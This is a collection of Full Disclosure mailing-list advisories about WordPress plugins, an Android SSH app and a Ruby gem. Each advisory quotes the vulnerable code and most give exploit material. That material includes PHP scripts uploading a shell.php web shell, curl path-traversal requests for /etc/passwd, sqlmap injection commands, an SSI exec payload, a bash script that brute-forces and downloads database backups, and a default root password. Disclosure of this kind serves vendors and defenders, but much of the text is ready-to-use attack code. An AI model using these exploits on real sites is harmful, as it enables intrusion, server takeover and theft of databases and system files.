Lines 131-135 of upload.php fail to handle user input appropriately either by 
sanitizing or paramaterizing it. Injection points are
any GET/POST to albumid or name.

131 $query = INSERT INTO .$wpdb-prefix.pp_images (`category_id`, `title`, 
`description`, `price`, `thumb`, `image`, `status`, `order`, 
`creation_date` )
132   VALUES 
(.$_REQUEST['albumid'].,'.$imgname[0].','.$imgname[0].','','.$resize.','.$_REQUEST
['name'].',1,'','NULL');
133 
134   $wpdb-query($query);
135 

CVEID:
OSVDB:
Exploit Code:
• ?php
• /*Remote shell upload exploit for wp-powerplaygallery v3.3 */
• /*Larry W. Cashdollar @_larry0
• 6/27/2015
• albumid needs to be a numeric value matching an existing album 
number, 1 is probably a good start
• but you can enumerate these by using curl, and looking for redirect 
301 responses:
• e.g. $ curl 
http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
• -301 exists else 404 doesn't.
• shell is 
http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
• */
•  
•  
•   $target_url = 
'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
•   $file_name_with_full_path = '/var/www/shell.php';
•  
• echo POST to $target_url $file_name_with_full_path;
•   $post = array('albumid'='foo' , 'name' = 
'shell.php','file'='@'.$file_name_with_full_path);
•  
• $ch = curl_init();
•   curl_setopt($ch, CURLOPT_URL,$target_url);
•   curl_setopt($ch, CURLOPT_POST,1);
•   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
• curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
•   $result=curl_exec ($ch);
•   curl_close ($ch);
• echo hr;
•   echo $result;
• echo hr;
• ?
SQLi PoC:
$ sqlmap -u 
http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php 
--data albumid=1”  —dbms mysql

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777

[Larry W. Cashdollar]

Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam 
v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to 
run a swim team including registration, volunteer assignments, scheduling, and 
much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input 
from downloading sensitive system files:


 50 $file = urldecode($args['file']) ;
 51 $fh = fopen($file, 'r') or die('Unable to load file, something 
bad has happened.') ;
 52 
 53 while (!feof($fh))
 54 $txt .= fread($fh, 1024) ;
 55 
 56 //  Clean up the temporary file - permissions
 57 //  may prevent this from succeedeing so use the '@'
 58 //  to suppress any messages from PHP.
 59 
 60 @unlink($file) ;
 61 }
 62 
 63 $filename = urldecode($args['filename']) ;
 64 $contenttype = urldecode($args['contenttype']) ;
 65 
 66 // Tell browser to expect a text file of some sort (usually txt or 
csv)
 67 
 68 header(sprintf('Content-Type: application/%s', $contenttype)) ;
 69 header(sprintf('Content-disposition:  attachment; filename=%s', 
$filename)) ;
 70 print $txt ;

CVEID:
OSVDB:
Exploit Code:
• $ curl 
http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwdfilename=/etc/passwdcontenttype=text/htmltransient=1abspath=/usr/share/wordpress;

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] SQL Injection in easy2map-photos wordpress plugin v1.09

[Larry W. Cashdollar]

Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating 
great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection 
attack because they aren’t parameterized or sanitizing user input.

48 $wpdb-query(sprintf(UPDATE $mapsTable
49 SET PolyLines = '%s'
50 WHERE ID = '%s';, $PolyLines, $mapID));
218 $wpdb-query(sprintf(
219 UPDATE $mapsTable
220 SET TemplateID = '%s',
221 MapName = '%s',
222 Settings = '%s',
223 CSSValues = '%s',
224 CSSValuesPhoto = '%s',
225 CSSValuesMap = '%s',
226 MapHTML = '%s',
227 IsActive = 1
228 WHERE ID = %s;,
229 $_REQUEST['mapTemplateName'],
230 $_REQUEST['mapName'],
231 urldecode($_REQUEST['mapSettingsXML']),
232 urldecode($_REQUEST[parentCSSXML]),
233 urldecode($_REQUEST[photoCSSXML]),
234 urldecode($_REQUEST[mapCSSXML]),
235 urldecode($_REQUEST[mapHTML]), $mapID));


238 //this is a map insert
239 if (!$wpdb-query(sprintf(
240 INSERT INTO $mapsTable(
241 TemplateID,
242 MapName,
243 DefaultPinImage,
244 Settings,
245 LastInvoked,
246 PolyLines,
247 CSSValues,
248 CSSValuesPhoto,
249 CSSValuesMap,
250 MapHTML,
251 IsActive
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', 
'%s', 0);,
253 $_REQUEST['mapTemplateName'],
254 $_REQUEST['mapName’]


331 $wpdb-query(sprintf(
332 UPDATE $mapsTable
333 SET MapName = '%s'
334 IsActive = 1
335 WHERE ID = %s;,
336 $_REQUEST['mapName'],
337 $mapID));

Also

In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone 
to create files outside of the intended upload directory by adding ../../../../ 
path traversal characters:

   if (!file_exists($imagesDirectory)) {
   mkdir($imagesDirectory);
   }

CVEID: 2015-4615 2015-4617
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' 
--data=mapID=11mapName='+or+1%3D%3D1%3Baction=e2m_img_save_map_name 
--cookie=COOKIE HERE --level=5 --risk=3


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5

[Larry W. Cashdollar]

Title: Remote file download vulnerability in wordpress plugin 
wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, 
message content, transaction results and PDF invoices with WYSIWYG editor and 
placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize 
user input to prevent sensitive system files from being downloaded.


1 ?php
2 require_once(../../../../wp-admin/admin.php);
3 
4 header('Content-disposition: attachment; filename='.$_GET['filename']);
5 header('Content-type: application/pdf');
6 readfile(HAET_INVOICE_PATH.$_GET['filename']);
7 ?

You'll have to rename the download file via mv -- 
-..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the 
download filename with path.

CVEID: Requested TBD
OSVDB: TBD

Exploit Code:
• $ curl 
http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0

[Larry W. Cashdollar]

Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01, removed vulnerable code.
Vendor Contact: n.mu...@gmail.com
Description: MDC YouTube Downloader allows visitors to download YouTube videos 
directly from your WordPress site.
Vulnerability:
The code in mdc-youtube-downloader/includes/download.php doesn't restrict 
access to the local file system allowing sensitive files to be
downloaded:

$file_name = $_GET['file'];

// make sure it's a file before doing anything!
if(is_file($file_name)) {
.
.
.
 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
case 'pdf': $mime = 'application/pdf'; break;
case 'zip': $mime = 'application/zip'; break;
case 'jpeg':
case 'jpg': $mime = 'image/jpg'; break;
default: $mime = 'application/force-download';
}
header('Pragma: public');   // required
header('Expires: 0');   // no cache
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime 
($file_name)).' GMT');
header('Cache-Control: private',false);
header('Content-Type: '.$mime);
header('Content-Disposition: attachment; 
filename='.basename($file_name).'');
header('Content-Transfer-Encoding: binary');
header('Content-Length: '.filesize($file_name));// provide file 
size
header('Connection: close');
readfile($file_name);   // push it out
exit();

CVEID: Requested, TBD.
OSVDB: TBD.
Exploit Code:
• $ curl 
http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] SQL Injection in easy2map wordpress plugin v1.24

[Larry W. Cashdollar]

Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom  great-looking 
Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent 
to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.

 90 $wpdb-query(sprintf(UPDATE $mapsTable
 91 SET PolyLines = '%s'
 92 WHERE ID = '%s';, $PolyLines, $mapID));

.
.
.
163 $wpdb-query(sprintf(
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;,
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items[mapCSSXML]),
180 urldecode($Items[listCSSXML]),
181 urldecode($Items[headingCSSXML]),
182 urldecode($Items[mapHTML]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186 
187 //this is a map insert
188 if (!$wpdb-query(sprintf(
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s', 
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, 
'%s');,
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', 
easy2map_get_plugin_url('/index.php')) . images/map_pins/pins/111.png,
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items[mapCSSXML]),
208 urldecode($Items[listCSSXML]),
209 urldecode($Items[headingCSSXML]),
210 urldecode($Items[mapHTML]),
211 $Items['mapThemeName']))) 
.
.
267 $wpdb-query(sprintf(
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;, $mapName, $mapID));

In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing 
../ to create files outside of intended directory:

4 $imagesDirectory = WP_CONTENT_DIR . 
/uploads/easy2map/images/map_pins/uploaded/ . $_GET[map_id] . /;
.
.
11 if (is_uploaded_file($_FILES[pinicon]['tmp_name'])) {
12 
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }

CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' 
--data=mapID=11mapName='+or+1%3D%3D1%3Baction=e2m_img_save_map_name 
--cookie=‘COOKIE HERE’ --level=5 --risk=3

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file download vulnerability in download-zip-attachments v1.0

[Larry W. Cashdollar]

Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description: 
Download all attachments from the post into a zip file.

Vulnerability:
from download-zip-attachments/download.php makes no checks to verify the 
download path is with in the specified upload directory.

?php
if(isset($_REQUEST['File'])  !empty($_REQUEST['File'])){
  define('WP_USE_THEMES', false);
  require('../../../wp-load.php');
  require create_zip_file.php;
  $uploads = wp_upload_dir(); 
  $tmp_location = $uploads['path']./.$_REQUEST['File'];
  //echo $tmp_location;
  $zip = new CreateZipFile;
  $zip-forceDownload($tmp_location,false); 
  unlink($tmp_location); 
  exit;
}

CVEID: 2015-4704
OSVDB:
Exploit Code:
• 
http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0

[Larry W. Cashdollar]

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete 
WordPress installation. This plugin allows you to rename WordPress database, 
WordPress directory, change every necessary configuration file, easily from one 
page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is 
within the intended download directory:

try{
$dbname   = $_GET[dbname];
$dumpfname = $_GET[dumpfname];
$backup_folder = $_GET[backup_folder];
}catch (Exception $e){}

if(empty($backup_folder)){
$backup_folder=backup/;
}
echo $dumpfname;
if (file_exists($dumpfname)) {  
// zip the dump file
$name=$dbname . _ . date(Y-m-d);
$zipfname = $backup_folder.$name..zip;
$zip = new ZipArchive();
if($zip-open($zipfname,ZIPARCHIVE::CREATE)) 
{
   $zip-addFile($dumpfname,$dumpfname);
   $zip-close();
}   
// read zip file and send it to standard output
if (file_exists($zipfname)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; 
filename='.basename($zipfname));
flush();
readfile($zipfname);

CVEID: 2015-4703
OSVDB:
Exploit Code:
• curl --data dbname=wpdumpfname=/etc/passwdbackup_folder=.  
http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin

[Larry W. Cashdollar]

Title: Remote file upload vulnerability in 
aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: 
https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plug...@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly 
Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in 
aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an 
unauthenticated user can upload any file to the system.  Including a .php file. 
 The upload.php doesn't check that the user is authenticated and a simple post 
will allow arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php 
the code doesn’t check for an authenticated Wordpress user:

1 ?php
2 
3 $filename = $_SERVER[DOCUMENT_ROOT]./wp-load.php;
4 if (file_exists($filename)) {
5 include_once($filename);
6 } else {
7 include_once(../../../../wp-load.php);
8 }
9 echo Here;
10 $image_file = $_FILES['gf_aviary_file'];
11 if($image_file['name']!=''){
12  $max_file_size =  4*1024*1024;
13  $file_size = intval($image_file['size']);
14  if( $file_size  $max_file_size ){
15  $msg = File Size is too big.;
16  $error_flag = true;
17  }
18  $extension = strtolower(end(explode('.', $image_file['name'])));
19  $aa_options = get_option('gf_aa_options');
20  $supported_files = $aa_options['supported_file_format'];
21  $supported_files = strtolower($supported_files);
22  if(!$error_flag  $supported_files != '' ){
23$supported_files = explode (',', $supported_files);
24if(!in_array($extension, $supported_files)){
25   $msg = No Supported file.;
26   $error_flag = true;
27}
28  }
29  if(!$error_flag){
30 $wp_upload_dir = wp_upload_dir();
31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32  mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33 }
34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36 $file_name = 
$upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38 $file_url = 
$upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
39 }
40 }
41 $return_obj = array('status' = 'success', 'message' = $file_url);
42 echo json_encode($return_obj);
43  }
44 ?

CVEID: 2015-4455
OSVDB:
Exploit Code:
• ?php
• /*Remote shell upload exploit for 
aviary-image-editor-add-on-for-gravity-forms v3.0beta */
• /*Larry W. Cashdollar @_larry0
• 6/7/2015
• shell will be located 
http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
• */
•  
•  
•$target_url = 
'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/
• upload.php';
•$file_name_with_full_path = '/var/www/shell.php';
•  
•echo POST to $target_url $file_name_with_full_path;
•$post = array('name' = 
'shell.php','gf_aviary_file'='@'.$file_name_with_full_path);
•  
•$ch = curl_init();
•curl_setopt($ch, CURLOPT_URL,$target_url);
•curl_setopt($ch, CURLOPT_POST,1);
•curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
•curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
•$result=curl_exec ($ch);
•curl_close ($ch);
•echo hr;
•echo $result;
•echo hr;
• ?

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17

[Larry W. Cashdollar]

Title: Remote file upload vulnerability in wordpress plugin 
videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31 won’t fix, 
http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site 
VideoWhisper Video Consultation is a web based video communication solution 
designed for online video consultations, interactive live presentations, 
trainings, webinars, coaching and online collaboration with webcam support. 
Read more on WordPress Video Presentation plugin home page.

Vulnerability:
From wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php Allows 
various remote unauthenticated file uploads, among the file types is html where 
the last 4 characters are only being checked in a file name to match which 
types are allowed. Because of this .shtml can be passed through and remote code 
execution if SSI is allowed. The code does not do any user access validation 
and therefore anyone can upload the following files to an unsuspecting 
wordpress site: 
.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps
 
The 
if (strstr($filename,'.php')) exit; 

can be by passed by using the extension .Php but the file extension check would 
allow files like test.Php.shtml
?php 
if ($_GET[room]) $room=$_GET[room]; 
if ($_POST[room]) $room=$_POST[room]; 
$filename=$_FILES['vw_file']['name']; 
include_once(incsan.php); 
sanV($room); 
if (!$room) exit; 
sanV($filename);
if (!$filename) exit; 
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
 if ( strstr($room,/) || strstr($room,..) ) exit; 
if ( strstr($filename,/) || strstr($filename,..) ) exit; 
$destination=uploads/.$room./“; 
if ($_GET[slides]) $destination .= slides/“; 
$ext=strtolower(substr($filename,-4)); 
$allowed=array(.swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps”);
 if (in_array($ext,$allowed)) 
move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); 
?loadstatus=1
CVEID: TBD
OSVDB: TBD
Exploit Code:
videowhis_poc.php 
 ?php
  
 $uploadfile=upexp.shtml;
 $ch = 
 
curl_init(http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php;);
 curl_setopt($ch, CURLOPT_POST, true);
 curl_setopt($ch, CURLOPT_POSTFIELDS,
  
array('vw_file'=@$uploadfile,'name'='upexp.shtml','room'='.'));
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 $postResult = curl_exec($ch);
 curl_close($ch);
 print $postResult;
  
 ?
  
  
 upexp.shtml
  
 html
  
 !--#exec cmd=/usr/bin/date  /tmp/p --
  
 this is html
 /html
  
  
 The executeable should be located in 
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Exploit for stealing backups on WP sites with WP-DB-Backup v2.2.4 plugin

[Larry W. Cashdollar]

#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 
plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is 
wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite

DATE=20141031; #Date to search

if [ ! -e rainbow ]; then

cat  -EOF-  rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include stdio.h
int
main (void)
{
  char string[16] = 0123456789abcdef;
  int x, y, z, a, b;
  for (x = 0; x  16; x++)
  for (y = 0; y  16; y++)
  for (z = 0; z  16; z++)
  for (a = 0; a  16; a++)
  for (b = 0; b  16; b++)
  printf (%c%c%c%c%c\n, string[x], string[y], string[z],
  string[a], string[b]);
return(0);
}
-EOF-
echo [+] Compiling rbow.c
gcc rbow.c -o rbow
echo [+] Creating rainbow table...
./rbow  rainbow
fi

if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo [+] Searching;
for x in `cat rainbow`; do 
CPATH=http://$1/wp-content/backup-$x/;;
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n $RESULT ]; then
 echo [+] Location $CPATH Found;
 echo [+] Received $RESULT;
 echo $x  found.txt;
 break; #break here
fi;
 echo -n Percent Done: ;
 Y=`echo scale=6;($Z/$K)*100|bc`;
 echo -n $Y
 echo %;
 Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi

# Now that we have the directory lets try to locate the database backup file.

K=999;
for y in `seq -w 0 999`; do 
CPATH=http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql;; 
#change WP Database Name and Table Prefix here
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n $RESULT ]; then
 echo [+] Database backup $CPATH Found;
 echo [+] Received $RESULT;
 wget $CPATH
 exit; #break here
fi;
 echo -n Percent Done: ;
 Y=`echo scale=2;($Z/$K)*100|bc`;
 echo -n $Y
 echo %;
 Z=$(( $Z + 1 ));
done


___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Rooted SSH/SFTP Daemon Default Login Credentials

[Larry W. Cashdollar]

I stumbled on to this while setting up an android vulnerability testing lab.

Title: Rooted SSH/SFTP Daemon Default Login Credentials

Author: Larry W. Cashdollar, @_larry0

OSVDB-ID: 110742

Date: 9/2/2014

Download: https://play.google.com/store/apps/details?id=web.oss.sshsftpDaemon

Description: This app is a SSH terminal server AND an SFTP file server.

Vulnerability: The software comes pre-configured with a default login of User: 
root Password: abc123. This weak password would easily be guessed leading to 
root compromise of the android system.

Recommended Fix: Request the user set the password upon installation.

Vendor: open.software.solutions[4t]gmail.com, Notified 9/3/2014

Greets to 44CON.

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Remote Command Injection in Ruby Gem sfpagent 0.4.14

[Larry W. Cashdollar]

Title: Remote Command Injection in Ruby Gem sfpagent 0.4.14

Date: 4/15/2014

Author: Larry W. Cashdollar, @_larry0

CVE: 2014-2888

Download: http://rubygems.org/gems/sfpagent

Vulnerability
The list variable generated from the user supplied JSON[body] input is passed 
directly to the system() shell on line 649. If a user supplies a module name 
with shell metacharacters like ; they might be able to execute shell commands 
on the remote system as the sfpagent running user id.

637 code, body = get_data(address, port, '/modules')
638 raise Exception, Unable to get modules list from 
{name} if code.to_i != 200
639 
640 modules = JSON[body]
641 list = ''
642 schemata.each { |m|
643 list += {m}  if 
File.exist?({modules_dir}/{m}) and
644(not modules.has_key?(m) 
or modules[m] != get_local_module_hash(m, modules_dir).to_s)
645 }
646 
647 return true if list == ''
648 
649 if system(cd #{modules_dir}; #{install_module} 
#{address} #{port} #{list} 1/dev/null 2/tmp/install_module.error)
650 Sfp::Agent.logger.info Push modules 
#{list}to #{name} [OK]
651 else
652 Sfp::Agent.logger.warn Push modules 
#{list}to #{name} [Failed]
653 end
654 
655 return true

Vendor: Notified 4/15/14. Version 0.4.15 fixes this issue.

Advisory: http://www.vapid.dhs.org/advisories/spfagent-remotecmd.html

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/